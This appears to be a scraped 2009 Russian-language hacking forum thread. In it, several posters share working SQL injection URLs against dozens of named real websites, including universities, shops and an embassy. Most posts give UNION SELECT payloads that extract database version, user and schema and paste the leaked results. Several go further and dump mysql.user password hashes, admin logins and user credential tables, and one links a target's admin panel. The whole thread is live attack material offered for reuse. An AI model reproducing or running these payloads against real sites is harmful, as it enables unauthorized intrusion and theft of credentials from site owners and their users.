http://grapholineuae.com/work.php?id=-1+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5,6,7,8,9--
http://testuser.artkatalog.net/WORK.php?ID=-1+union+select+concat_ws(0x3a,database(),version() ,user())--
http://zkb.wxc.edu.cn/new/work.php?id=-2+union+select+1,2,aes_decrypt(aes_encrypt(concat( database(),0x3a,version(),0x3a,user()),1),1),4,5,6 ,7,8--
pelligrim
03.07.2009, 09:37
http://www.paintballxxl.com/news_view.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6--
4.1.25-log:db00077859:00077859@localhost
HAXTA4OK
03.07.2009, 10:37
http://www.li.cj.edu.ro/index.php?pagina=activitati&activitate=zilele2008&cat=detalii&id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6--
gabi@localhost:5.0.67-0ubuntu6:licinfo
есть mysql.user
http://www.li.cj.edu.ro/index.php?pagina=activitati&activitate=zilele2008&cat=detalii&id=-1+union+select+1,group_concat(concat_ws(0x3a,user, password,file_priv)),3,4,5,6+from+mysql.user--
пароль расшифровывается)))
mailbrush
03.07.2009, 19:19
http://www.backwoodsbeachparty.com/revphp/rev.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6,7,8,9,10,11beach_reviews@localh ost:beach_reviews:5.0.81-community
PR 7
http://www.la.unm.edu/~bjudd/PHPMySQL/LA_dining/rest.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7--
LAdining:4.1.20:webuser@localhost
---
http://www.umeko.co.jp/work.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36--
http://www.mv-web.nl/work.php?id=-1+union+select+concat_ws(0x3a,database(),version() ,user())--
http://www.altstudio.be/work.php?pg=2&id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,data base(),version(),user()),10,11,12--
http://www.jacquesbedel.com/work.php?s=-1+union+select+concat_ws(0x3a,database(),version() ,user())--
PR - 4
http://www.planet-rock.com/news.php?id=-110+union+select+1,2,3,4,5,6,concat_ws(0x3a,databa se(),version(),user()),8,9,10--
Database Version: 5.0.67-log
PR - 5
http://www.daiky.net/main.php?page=articles&aid=-1+union+select+1,2,3,4,5,concat_ws(0x3a,database() ,version(),user()),7--&type=brit
Database Version: 4.0.27-standard
DezMond™
03.07.2009, 21:15
http://pribor-m.ru/main.php?show=a_ob&action=view&id=-110'+union+select+1,2,version(),4,5,6,7,8,9+/*+
4.0.27
http://belmilk.com/menu.php?id=-4+union+select+1,group_concat(table_name),3,4,5,6, 7,8,9+from+information_schema.tables+/*+
http://www.sushi-house.ru/menu.php?id=-4+UnIon+SeLect+1,2,version(),4,5,6,7,8,9,10,11,12, 13+/*+
4.1.22
http://www.bonappetit.net.ru/menu.php?ID=-0+union+select+1,2,version(),4,5,6,7,8+/*+
http://www.wheatmontana.com/deli-menu.php?id=-6'+UnIon+SeLect+1,2,3,version(),5,6,7+--+
http://wotlk.atricom.ru/index.php?news=-1'+UNION+SELECT+1,concat_ws(0x0b,@@version_compile _os,version()),3,4,5,6--+
pc-linux-gnu
5.0.51a
http://www.prestonredman.co.uk/ourservices.php?id=-6+union+select+1,2,3,4,5,6,7,8
4.1.21-community-nt
http://www.legalrecruitment.co.uk/index.php?id=-63+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14
4.0.27-standard-log
http://www.pro-projector.ru/main.php?production=-1453+union+select+1,concat_ws(0x3a,database(),vers ion(),user()),3,4,5,6,7,8,9,10--&cat=4
Database Version: 5.0.75-log
P.S. См тайтл)
HAXTA4OK
04.07.2009, 10:48
PR: 5
http://www.dr-schutz-russia.com/index.php?view=product&id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version (),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24--
dbu1106461@localhost:5.0.32-Debian_7etch10-log:db1106461-russia
#####################################
ТИЦ: 200
PR: 4
http://www.zoddom.ru/priview.php?id=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2,3,4,5,6,7,8--&t=dr
h_zoddom_ru@localhost:zoddom_ru:4.1.22-log
####################################
http://www.droidrunner.com/index.php?ID=1&page=A&go=up&forum=DR&index=5+and+substring(version(),1,1)=5--
[PR 4]
http://www.mondorecords.com/shop.php?id=-433+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ve rsion(),database(),user()),10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37
4.0.27-standard:db124719782:dbo124719782@localhost
===============
[PR 4]
http://www.hitchedmag.com/article.php?id=-526+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44
5.0.51a-log:hitchedm_hitched:hitchedm_test@boscgi1202.eigb ox.net
===============
[PR 3]
http://ingrus.net/york/details.php?id=-190+union+select+concat_ws(0x3a,0x3c2f7469746c653e ,version(),database(),user())
4.1.22:db_ingrus_5:dbu_ingrus_1@192.168.7.4
M.W.N.N.
05.07.2009, 07:53
http://romanceratings.com/review.php?id=11+union+select+1,2,3,4,concat_ws%28 0x3a,version%28%29,database%28%29,user%28%29%29,6, 7,8,9+from+information_schema.columns+limit+1,1
version():5.0.51a-24+lenny1-log
database():romanceratings
user():romanceratings@localhost
Table_schema,Table_name,Column_name
::::::romanceratings:reviews:id
::::::romanceratings:reviews:name
::::::romanceratings:reviews:title
::::::romanceratings:reviews:rating
::::::romanceratings:reviews:comments
::::::romanceratings:reviews:date
::::::romanceratings:reviews:siteid
::::::romanceratings:sites:id
::::::romanceratings:sites:name
::::::romanceratings:sites:small
::::::romanceratings:sites:medium
::::::romanceratings:sites:large
::::::romanceratings:sites:image
::::::romanceratings:sites:blurb
::::::romanceratings:sites:blurbimage
::::::romanceratings:sites:affiliatelink
PR 5
http://www.bluedoor.com.cn/bluedoor/work.php?id=1+union+select+concat_ws(0x3a,database (),version(),user())--
Вывод в теге embed
---
PR 5
http://www.moehlin.ch/new.php?&id=1&news_id=-472+union+select+1,2,3,concat_ws(0x3a,database(),v ersion(),user()),5,6--
---
PR 4
http://www.arquimea.com/sections/work.php?id=99999999+union+select+1,2,3,4,concat_w s(0x3a,database(),version(),user()),6,7--
Собачки =)
http://www.veorkf.ru/catalog/dog.php?id=-5338+union+select+concat_ws(0x3a,database(),versio n(),user())--
http://www.movingafghans.com/dog.php?id=-26+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5,6--
http://www.kemosabeterriers.com/dog.php?id=12+union+select+1,concat_ws(0x3a,databa se(),version(),user()),3--
http://www.akitas.gr/english/dog.php?id=-281+union+select+1,2,concat_ws(0x3a,database(),ver sion(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 ,68--
http://www.bradstar.co.uk/dog.php?id=-24+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5--
http://www.panoniantrain.net/strane/dog.php?id=-6+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7,8,9,10,11--
http://www.fenerbahce.ro/haber_detay.php?id=-173+UNION+SELECT+1,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),3,4,5,6,7,8
Database Version: 4.1.22-max
Database name: fener_fenerbahcebd
User name: fener_fener@localhost
Os: unknown-linux-gnu
beerhack
05.07.2009, 14:10
PR 5
http://matematicas.uniandes.edu.co/summer2007/index.php?Id=-1+union+select+1,version(),3,4,5,6,7,8,9,0/*
Database Version: 5.0.45
Database name: WebMath
User name: ma73ma71ca2@localhost
[PR:2]
db info:
http://petri.ru/products.php?product=-62+union+select+1,concat_ws(':',version(),user(),d atabase()),null
5.0.30-Debian_1-log:z71188_dbase@77.221.130.5:z71188_dbase
tables:
http://petri.ru/products.php?product=-62+union+select+1,2,group_concat(0x0b,table_name)+ from+information_schema.tables+group+by+table_sche ma+limit+1,1
prod_sub,
tech,
tech_to_tech_sub,
title_description,
config,
news_categories,
partners,
buy_sub_description,
prod_sub_description,
tech_description,
texts,
ulist,
partners_to_partners_sub,
buy_to_buy_sub,
languages,
news_categories_description,
partners_description,
buy,
prod_to_categories_prod,
tech_sub,
texts_description,
prod,
categories_prod,
mysql_errors,
news_description,
partners_sub,
buy_description,
prod_description,
prod_to_prod_sub,
tech_sub_description,
title,
categories_prod_description,
news,
news_to_categories,
partners_sub_description,
buy_sub
PR - 3
http://www.inbi.ru/index.php?newsmore=-1870+union+select+1,2,3,concat_ws(0x3a,database (),version(),user()),5--
Database Version: 5.0.75-community-log
DezMond™
05.07.2009, 18:11
PR5
http://www.bonobomusic.com/bonobo/releases.php?release=-1512+union+select+1,2,table_name,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21+from+information_sc hema.tables+limit+145,1000+/*+
http://www.ajvengo.ru/menu.php?gid=-00000321+union+select+1,2+/*+&id=00001208
http://www.hatton-arms.co.uk/restaurant-menu.php?id=-7'+union+select+1,2,concat_ws(0x3a3a,username,pass word,access_level),4,5,6,7,8,9,10+from+users+where +access_level=1+--+
http://www.edohana.com/menu.php?id=-12+union+select+1,pass+from+member+--+
http://www.teatrprod.by/menu.php?id=-222+union+select+1,concat_ws(0x3a3a,user_id,user_c ompany,user_name,user_email,group_id),3,4,5,6,7,8, 9+from+users+/*+
db info:
http://tmck.kz/company/news/?cid=0&rid=-545'+union+select+1,2,3,4,concat_ws(':',version(), user(),database())--+
5.0.30-Debian_1-log : z72124_tmsite@77.221.130.5 : z72124_tmsite
tables:
http://tmck.kz/company/news/?cid=0&rid=-545'+union+select+1,2,3,4,group_concat(0x0a,table_ name)+from+information_schema.tables+group+by+tabl e_schema+limit+1,1--+
_faq, _kats, _photo, _users, _cache, _voute, _files, _links, _prod, _category, _voute_ip, _gb, _news, _razm_trub, _access, _comment, _zamki, _kat_cfg, _page, _sprav, _atribut, _comment_cfg, shopping
5.0.45-log: :mangos@localhost:unknown-freebsd7.0:characters
http://wow.bpnet.ru/gilds.php?guid=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,version(),user(),@@version_compil e_os,database()),3,4,5,6,7,8,9,10,11,12/*
5.0.45-community-nt:mangos@localhost:Win32:characters
http://pavjek.no-ip.info/gilds.php?guid=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,version(),user(),@@version_compil e_os,database()),3,4,5,6,7,8,9,10,11,12/*
Skofield
05.07.2009, 22:38
PR 5
http://www.genevainternational.org/navigate.php?kind=1&id=1397&lang=en&last=99&lastsub=-280+union+select+1,group_concat(0x3a,version(),dat abase(),user()),3+/*
5.0.32-Debian_7etch8-log : geinternational : gvainternational@192.168.3.110
HAXTA4OK
05.07.2009, 23:26
http://hj-co.com/series.php?ID=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5--
hjcocom_power@localhost:4.1.22-standard:hjcocom_power
####################################
PR: 6
http://www.iranculture.org/commission/hj/Index.php?ID=1+and+substring(version(),1,1)=3/*
иранская культура +)
#####################################
что то про футбол
http://www.warkaus-jk.com/selostus.php?id=-1+union+select+1,concat_Ws(0x3a,version(),database (),user()),3--
4.0.25:db_wjk:vkjanot@localhost
[PR 6]
http://www.newsletteraccess.com/display_article.php?id=-8997+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,concat_ws(0x3a,version(),database(),user()),33,3 4,35,36,37,38,39,40,41,42,43,44--
4.0.20-standard:newsletters:newsletteraccess@localhost
===============
[PR 6]
http://www.baruch.cuny.edu/bpac/calendar/event.php?id=-410+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,vers ion(),database(),user()),9--
4.0.16-standard:bpac:bpac@localhost
===============
[PR 4]
http://www.wbstraining.com/php/events/showevent.php?id=-150+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),database(),user()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23
5.0.45:wbs:lomokev@server213-171-218-189.livedns.org.uk
beerhack
06.07.2009, 01:26
PR 5
http://www.clubselecta.com.co/establecimientos.php?id=-1+union+select+1,concat_ws(0x3a,user,password)+fro m+mysql.user+limit+0,1/*
Database Version: 4.0.31
Database name: club_selecta
User name: elpais@localhost
M.W.N.N.
06.07.2009, 03:08
http://akmentornis.com/forum.php?mid=175+union+select+1,concat_ws%280x3a, version%28%29,database%28%29,user%28%29%29,3,4,5,6 ,7,8,9,10,11,12+limit+1,1/*
version():4.0.27-max-log
database():tehnomag_tmag
user():tehnomag_tmag@v3.valuehost.ru
Skofield
06.07.2009, 14:39
PR 5
http://www.meddb.info/index.php.en?cat=-4+union+select+1,2,version(),4/*
Database Version: 5.0.27-standard-log
Database name: med_db
User name: koenjo1@localhost
-----------------------------------------------------------------------------------------------------------------
PR 5
http://www.pathology.med.umich.edu/policies/index.php?id=-209'+union+select+1,concat_ws(0x3a,user,password), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25+from+mysql.user/*
Database Version: 4.0.27-nt
Database name: pathology
User name: root@www.pathology.med.umich.edu
http://www.bufferbear.co.uk/listNursery.php?id=-40+union+select+1,2,coNCAT_ws(chAR(42,32,42),user( ),database(),version()),4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18
salarysacrifice@localhost* *salarysacrifice* *4.0.21-standard
Skofield
06.07.2009, 17:47
PR 5
http://www.plus2net.com/php_tutorial/php_blog_dtl.php?id=-3+union+select+1,2,version(),4--
Database Version: 5.1.30
Database name: syamalav_plus2net
User name: syamalav_plus@localhost
http://www.gaiahouse.co.uk/pages.php?id=-3+union+select+1,2,3,version(),5,6
4.1.22-standard-log
[PR 5]
http://osa.nccu.edu.tw/en/modules/tinyd9/content/index.php?id=1&anno_ID=-92+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(concat _ws(0x3a,version(),database(),user()))),11
4.1.11:studaff:reid@localhost
http://osa.nccu.edu.tw/en/modules/tinyd9/content/index.php?id=1&anno_ID=-92+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(concat _ws(0x3a,user,password,file_priv))),11+from+mysql. user
http://www.tangodiva.com/index.php?page=features&j=1&cat=3&story_id=591+union+select+concat_ws(0x3a,version() ,database(),user())+limit+1,1--
5.0.45:tangodiv tangodiva:tangodiv@localhost
http://www.tangodiva.com/index.php?page=features&j=1&cat=3&story_id=591+limit+0+UNION+SELECT+CONCAT(id,userna me,password)+FROM+alpha.divas+LIMIT+1,1--
beerhack
07.07.2009, 12:08
PR 5
https://students.washington.edu/shpe/officers.php?id=-1+union+select+1,version(),3,4,5,6,7/*
Database Version: 5.0.27-standard
Database name: users
User name: root@students01.u.washington.edu
http://students.washington.edu/wwuf/calendar/cal_cat.php?op=cat&id=-1'+union+select+1,2,3,4,5,6,7,8,9,0,11,concat_ws(0 x3a,user,password),13,14,15,16,17,18+from+mysql.us er/*
http://www.affordablewine.co.uk/store.php?cat=3+limit+0+UNION+SELECT+1,CONCAT(Data base(),User(),Version()),3,4,5,6,7,8,9--
5.0.82-communityweb229-affordweb229-afford@localhost
http://www.xl-portal.ro/?x=stire&id=-1+UNION+SELECT+1,2,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),4,5,6--
Database Version: 5.0.67-community-log
Database name: aikowebd_xlportal
User name: aikowebd_xlporta@193.223.101.236
Os: redhat-linux-gnu
http://www.wyevalleybrewery.co.uk/news_view.php?id=-176+union+select+1,group_concat(table_name),3,4,5+ from+information_schema.tables
http://www.alpenstock.co.uk/tents.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6, 7,8+from+information_schema.tables
pelligrim
07.07.2009, 14:59
http://gerpes.com.ua/bolezni/?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7--
4.0.27-standard-log:gerpeso_gerpes:gerpeso_gerpes@localhost
http://prasu.com.ua/index.php?id=1+union+select+1,2,3,concat_ws(0x3a,v ersion(),database(),user())--
5.1.30:db_prasu:admin_prasu@localhost
PR 4
http://www.tradevoyage.by/new.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,database(),v ersion(),user()),6,7,8,0,10--
tradevoyageby_tradevoyage:5.1.34-community-log:tradevoyageby@localhost
PR 4
http://www.ouimagazine.net/carnet/new.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,database(),v ersion(),user()),6,7,8,9--
gilles:5.0.32-Debian_7etch10-log:gilles@localhost
----------
http://www.nnasos.ru/new.php?id=-1+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4--
http://www.konevps.ru/new.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3--
http://sp-homelighting.com/new.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,database(),v ersion(),user())--
http://www.cirsainteractive.com/html/new.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,database() ,version(),user()),7--
Skofield
07.07.2009, 16:15
http://www.teethwhiteningreviews.com/item.php?id=-7+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13/*
5.0.45:teethwh_mydb:teethwh_mydb@localhost
-------------------------------------------------------------------------------------------------------------------------
http://www.wallawallacountydemocrats.org/modules/newsletters/simpleview.php?id=-150+union+select+1,2,3,4,version(),6,7,8,9,0,11,12 ,13,14,15,16,17,18+from+users/*
Database Version: 5.0.45-Debian_1ubuntu3.3-log
Database name: wallawallacountydemocrats
User name: wallawalla@172.16.0.179
[PR 6]
http://www.smap.eu/EN/index.php?page=home2.php&id=-803+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a, version(),database(),user()),11,12,13,14,155.0.45: smap_db:smap_db_user@localhost
==================
[PR 3]
http://www.unlocknews.eu/index.php?id=-8+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17--4.1.22:unlocknews:unlocknews@localhost
Skofield
08.07.2009, 12:17
PR 5
http://www.pcgg.de/workshop_detail.php?id=-87+union+select+1,2,3,4,unhex(hex(version())),6,7, 8,9,10,11,12/*
Database Version: 5.0.18
Database name: usr_web234_1
User name: web234@localhost
beerhack
08.07.2009, 14:38
http://www.ipservice.com.co/faqingb.php?id=-1+union+select+1,version(),3,4,5/*
Database Version: 4.1.22-standard
Database name: ipservic_adminfaq
User name: ipservic_admin@localhost
Skofield
08.07.2009, 14:52
http://www.globalspeakers.com.au/viewspeaker.php?id=-434+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25+from+admi n/*
Database Version: 5.0.22-log
Database name: c893_global
User name: C893_glb@203.16.60.230
-----------------------------------------------------------------------------------------------------------------
http://www.bouncy-castles-for-hire.co.uk/bouncy-castle-hire.php?id=-75+union+select+1,version()--
Database Version: 5.0.82-community
Database name: web33-bouncy
User name: web33-bouncy@localhost
beerhack
08.07.2009, 16:42
http://www.wrekin-shell-mouldings.co.uk/certification.php?id=1+union+select+1,2,3,concat_w s(0x3a,user_id,user_email,user_password),5,6,7,8,9 ,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31+from+users/*
Database Version: 4.1.22-log
Database name: wsmdb
User name: wsmuser@localhost
PR 6
http://www.greenday.com/article.php?id=-333+union+select+1,2,3,4,concat_ws(0x3a,database() ,version(),user()),6--
greensite:5.0.45:greensite@localhost
users:
http://www.greenday.com/article.php?id=-333+union+select+1,2,333,444,column_name,6+from+in formation_schema.columns+where+table_name=0x757365 7273+limit+1,1+--
админку не нашел :(
http://www.motormania.hr/index.php?forwardUrl=subcategory.php&id=-1935+union+select+111,2,3/*
mmania_www@localhost:4.1.22-standard:mmania_www
Пароли все равно никуда не подходили, поэтому и выложил.
всем чмоке
mr.gr33n
08.07.2009, 23:23
http://www.alv-cr.cz/members.php?id=-24+union+select+1,concat(user,0x3a,pass),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+fro m+users--
http://www.kuklachev.ru/show_article.php?page=articles&id=-16+union+select+1,concat(name,0x3a,member_login_ke y),3+from+fm_members+limit+1,1
з.ы. сайт куклачёва xD
http://www.indiani.cz/web/articles.php?id=-52+union+select+1,concat(login,0x3a,heslo),3,4,5,6 ,7+from+admin--
http://www.flightsim.cz/article.php?id=-53+union+select+1,concat(fs01_username,0x3a,fs01_p wd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+fs0 1_users--
mr.gr33n
08.07.2009, 23:41
Еще чуток
http://www.pshsoft.net/pshsoft/en/product.php?id=-10013+union+select+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10,11,12,13,14,15+from+user
http://wap.relatio.ro/onews/cat.php?id=13++union+select+1,concat(username,0x3a ,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28+from+mos_users--
http://www.disa-international.com/news.php?id=-34+union+select+concat(username,0x3a,password),2,3 ,4+from+admins--
http://www.hageshii.org/pages/film.php?id=-33+union+select+1,concat(user_name,0x3a,user_pwd), 3,4,5,6,7,8,9+from+dc_user--
http://www.merchandisingf1.com/en/news.php?id=-34+union+select+1,2,3,concat(username_usr,0x3a,pas sword_usr),5,6,7,8,9+from+mll_users_usr--
http://webdevtips.co.uk/webdevtips/article.php?item=-63+union+select+1,concat(username,0x3a,user_passwo rd),3,4,5,6,7+from+phpbb_users+limit+1,1--
http://www.worksmart.org.uk/jargonbuster/index.php?id=-20+union+select+1,concat_ws(0x3a,version(),user(), database())--
4.1.20:worksmart@localhost:tuc
http://www.urolognadom.ru/index.php?id=-2+union+select+1,2,3,4,5,concat_ws(0x3a3a,version( ),user(),database()),7--
4.1.22::urologna@bix.rbc.ru::wwwurolognadomru_urol og
http://www.cbr-group.ru/index.php?id=-22+union+select+1,2,3,4,concat_ws(0x3a3a,version() ,user(),database()),6,7,8,9,10,11,12,13,14,15,16--
4.0.24_Debian-10sarge2-log::cbr-group@localhost::cbr-group
http://www.lj-data.dk/vare_soft.php?varenr='UNION+SELECT+1,2,concat_ws(0 x3a,USER(),DATABASE(),VERSION()),4,5,6,7,8,9'
ljdatadk@maggie.andersenit.dk:ljdatadk:5.0.51a-log
pelligrim
09.07.2009, 10:39
http://pyatoe.ru/info/articles/?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user())--
4.1.22-log:pyatoer1_:pyatoer1_1@localhost
http://www.belembassy.org/moldova/index.php?id=3&d=articles&economic_id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user())--
4.1.21:moldova:mfa@localhost
eurotrade.hr
магазин, распространяющий it продукцию :)
http://www.eurotrade.hr/eurotrade/cijenik.php?id=3&id1=-7+union+select+1,2,3/*
EUROTRA_DAVID@LOCALHOST:4.1.22:EUROTRA_EUROTRADE
/home/sites/www.eurotrade.hr/eurotrade/
..::TROYAN::..
09.07.2009, 14:06
http://www.mediastar.ru/news/?nid=-466+union+select+1,2,concat_ws(0x3a3a3a,user(),ver sion(),database()),4,5,6,7--
mediastar@172.16.2.12:::4.0.23a:::mediastar
pr:4
тиц:150
http://www.mydj.ru/?sid=-31224+union+select+1,2,3,4,concat_ws(0x3a,user(),d atabase(),version()),6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24--
mydj01@localhost:mydj01:5.0.45
http://www.mydj.ru/?sid=-31224+union+select+1,2,3,4,group_concat(table_name ),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24+from+information_schema.tables--
pr:2
тиц:180
mr.gr33n
09.07.2009, 19:11
http://www.pacesetterevents.com/news.php?id=-
65+union+select+1,concat(Name,0x3a,Password),3,4,5 ,6,7+from+pacesett_regdb.users--
http://www.cahcare.com/news.php?id=-65+union+select+1,concat(username,0x3a,passwd),3,4 ,5,6,7,8+from+cahcare_users+limit+5,1--
-------------------------
http://www.cahcare.com/admin/
-------------
http://www.logar.ru/index.php?act=top_list&id=-22+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7--
4.0.27-log:logar1815@pm2.zenon.net:logar1815
Krist_ALL
09.07.2009, 19:30
http://www.audioza.ru/audiobook.php?book_id=-66+union+select+1,2,3,4,5,6,count(*),8+from+admin
5тая ветка
пр 2 тиц 30
http://euroreviews.eu.funpic.de/bookdetails.php?book_id=-409+union+select+1,2,pass,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18+from+users
пр 3
beerhack
09.07.2009, 20:17
http://www.machinestudios.co.uk/viewentry.php?id=1+union+select+1,2,3,4,5,concat_w s(0x3a,username,password)+from+logins--
Database Version: 5.0.67-log
Database name: DB515306
User name: U515306@ripper.store
http://www.timefare.com/products.php?CAT=3+limit+0+UNION+SELECT+1,CONCAT(V ersion(),Database(),User()),3--
4.1.22-standard time_products time_web@localhost
http://www.imaginemason.org/home.php?ID=73+limit+0+UNION+SELECT+1,2,3,4,5,6,7, CONCAT(Version(),Database(),User()),9,10,11,12,13--
Database Version: 5.0.67-log
Database name: mason_data
User name: mason_user@209.173.135.197
mr.gr33n
09.07.2009, 21:05
http://www.gtbike.ru/news.php?id=-95+union+select+1,2,3,4,5,concat(username,0x3a,use r_password),7,8,9+from+gt_phpbb_users+limit+1,1--
=========
http://www.eurodownload.com/download-links.php?cat=3+union+select+CONCAT(Version(),Data base(),User())+limit+1,1--
Database Version: 5.0.45
Database name: eurodownload
User name: eurouser@localhost
http://www.eurodownload.com/download-links.php?cat=3+limit+0+UNION+SELECT+CONCAT((SELEC T+CONCAT(developers_login,developers_passwd)+FROM+ eurodownload.ed_developers+limit+1,1))--
хз куда там вводить логин пасс,если найдете киньте в ПМ
Krist_ALL
09.07.2009, 23:15
http://www.arminfo.info/index.php?show=article&id=-15366+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21+from+articles 4я ветка
http://www.vectorsjournal.org/index.php?page=7&projectId=-57+UNION+SELECT+concat_ws(0x3a,%20user(),%20databa se(),%20version()),2/*
в титле
http://www.terastudio.com/index.php?page=ar&n=-1854+UNION+SELECT+1,2,3,concat_ws(0x3C42523E,%20us er(),%20database(),%20version()),5,6,7,8,9,10,11,1 2+/*
beerhack
10.07.2009, 11:29
http://www.owv-hv.de/wanderwege/wanderwege.php?id=-1+union+select+1,concat_ws(0x3a,g_userName,g_hashe dPassword,g_email),3,4,5,6,7,8,9,0,11,12,13,14,15, 16,17+from+usr_web4_2.g1_User+limit+1,1/*
Database Version: 5.0.32-Debian_7etch8-log
Database name: usr_web4_1
User name: web4@localhost
http://www.bottegangeli.com/prod_details.php?prod_id=-1+union+select+1,2,3,4,5,6,concat(table_name,0x20, column_name,0x20,table_schema),8,9,10,11,12,13,14+ from+information_schema.columns
http://specialtylingerie.ca/lingerie.php?lsID=-1+union+select+1,2,3,4,version()
[PR 5]
http://www.guesthouses.be/template/kalender.php?id=-53+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67, 68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84 ,85,86,87
5.0.22:guesthouses02:guesthouses@localhost
=====================
[PR 5]
http://www.zuidpool.be/kalender.php?ID=-32+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7--&productienaam=kReon
4.1.21-standard:zuidpool:zuidpool@localhost
=====================
[PR 4]
http://www.fsek.lth.se/old//kalender.php?id=-592+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8&month=-20
5.0.54-log:web:web@localhost
=====================
[PR 2]
http://www.bmcenter.be/kalender.php?ID=-99+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5
5.0.45-Dotdeb_0.dotdeb.1.1.CGA.1:bmcenter:admin@hostingst 504.isp.belgacom.be
http://www.bmcenter.be/kalender.php?ID=-99+union+select+1,2,3,concat_ws(0x3a,user,password ,file_priv),5+from+mysql.user
http://www.bmcenter.be/kalender.php?ID=-99+union+select+1,2,3,concat_ws(0x3a,user,pwd),5+f rom+user
=====================
[PR 1]
http://www.heidetravel.be/kalender.php?id=-14+union+select+concat_ws(0x3a,version(),database( ),user()),2
5.0.32-Debian_7etch10-log:heidetravel_be:heidetravel_be@srv74.one.com
=====================
[PR 1]
http://www.bockmans.se/kalender.php?id=-17+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20
4.0.27-standard:easyinfo_k:easyinfo@dedi52.aname.net
=====================
[PR 0]
http://www.pluspunthw.nl/kalender.php?id=10+union+select+1,2,concat_ws(0x3a ,version(),database(),user())+limit+1,1
5.0.51a-24-log:leenb_ppunt:leenb_ppunta@wh-www15.xs4all.nl
http://www.mossberg.com/products/default.asp?id=1%20or%201=@@version--
Microsoft SQL Server 2005 - 9.00.2050.00 (Intel X86) Feb 13 2007 23:02:48 Copyright (c) 1988-2005 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Skofield
10.07.2009, 15:54
